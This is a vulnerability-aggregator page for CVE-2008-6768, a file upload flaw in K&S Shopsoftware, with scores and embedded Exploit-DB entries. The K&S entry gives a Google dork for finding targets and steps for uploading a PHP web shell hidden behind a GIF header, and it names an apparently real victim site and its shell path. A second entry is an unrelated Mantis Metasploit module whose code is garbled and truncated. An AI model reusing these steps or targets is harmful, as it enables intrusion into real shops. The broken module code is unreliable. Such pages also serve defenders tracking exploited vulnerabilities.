CVE-2008-6768
published 2009-04-29CVE-2008-6768: Unrestricted file upload vulnerability in admin/editor/images.php in K&S Shopsoftware allows remote attackers to execute arbitrary PHP code by uploading a file…
PriorityP349medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
4.43%
90.2th percentile
Unrestricted file upload vulnerability in admin/editor/images.php in K&S Shopsoftware allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in images/upload/.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
exploitdb·2018-05-10
CVE-2008-4687 Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Mantis manage_proj_page PHP Code Execution',
'Description' => %q{
Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
Code Execution vulnerability in the sort parameter of the
manage_proj_page.php page.
},
'Author' => [
'EgiX', # Exploit-DB Entry Author
'Lars Sorenson' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '6768'],
['CVE', '2008-4687'],
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Mantis 'Oct 16, 2008',
'DefaultTarget' => 0))
register_options(
[
Opt
Exploit-DB
K&S Shopsysteme - Arbitrary File Upload
exploitdb·2008-12-17
CVE-2008-6768 K&S Shopsysteme - Arbitrary File Upload
K&S Shopsysteme - Arbitrary File Upload
---
## Script Name: Shopsysteme (new version oscommerce)
## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :)
## Author: mNt
## File Upload Bug
## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]
## Use:
http://www.example.com/
after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
File uploaded php shell
after in url: http://www.example.com/images/upload/mNt.php
Attention: Shell Code İn GIF89;a
## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
## Php Shell Adres: http://www.trampleandfetish.de/images/upload/d
http://osvdb.org/51210http://secunia.com/advisories/33212http://www.securityfocus.com/bid/32888https://exchange.xforce.ibmcloud.com/vulnerabilities/47424https://www.exploit-db.com/exploits/7500http://osvdb.org/51210http://secunia.com/advisories/33212http://www.securityfocus.com/bid/32888https://exchange.xforce.ibmcloud.com/vulnerabilities/47424https://www.exploit-db.com/exploits/7500
2009-04-29
Published